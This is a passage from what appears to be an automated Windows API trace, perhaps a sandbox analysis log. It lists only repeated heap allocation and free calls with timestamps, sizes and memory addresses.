lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.232] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.232] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.233] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.233] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b25070 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.234] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.234] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x3b7b950 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.235] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.237] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.237] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.238] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b25070 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b25070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.239] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.239] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3b7b950 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 | out: hHeap=0x2c0000) returned 1 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc0) returned 0x32d6428 [0207.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d6428 